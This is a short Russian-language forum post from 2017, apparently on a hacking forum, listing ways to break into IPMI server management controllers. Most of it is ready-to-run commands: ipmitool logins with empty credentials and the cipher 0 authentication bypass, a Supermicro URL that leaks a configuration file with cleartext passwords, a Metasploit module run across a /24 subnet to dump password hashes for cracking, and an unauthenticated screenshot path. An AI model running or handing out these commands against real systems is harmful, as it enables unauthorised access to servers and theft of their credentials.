
07.08.2017, 20:08
|
|
Постоянный
Регистрация: 17.03.2014
Сообщений: 530
С нами:
6398966
Репутация:
154
|
|
Ещё немного в кассу уязвимости ipmi
* Cleartext: ipmitool -H -U "" -P "" user list 1 - пустой пароль пустой логин, может дать доступ
* AUth bypass Cipher 0: выполнить команды без аутентификации
Код:
ipmitool -U ADMIN -P "1223" -C 0 -H lan print 1
или
Код:
ipmitool -I lanplus -U ADMIN -P "1223" -C 0 -H lan print 1
- Пароль любой
* Обратившись на порт T:49152 на URL "/PSBlock" можно скачать конфигурационный файл 'XXXX_bmc.conf', содержащий пароли в открытом виде. Преимущественно подвержены Supermicro Onboard IPMI контроллеры.
* в спецификации IPMI 2.0 заложена возможность вытащить и брутить хеши паролей (которые используют уязвимые sha1 и md5) от всех учеток через 623 порт UDP
Код:
msfconsole
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS 10.0.0.0/24
set THREADS 256
run
* Последний скрин можно глянуть без аутентификации по пути
http://IP-OF-IPMI/images/Snapshot.bmp
|
|
|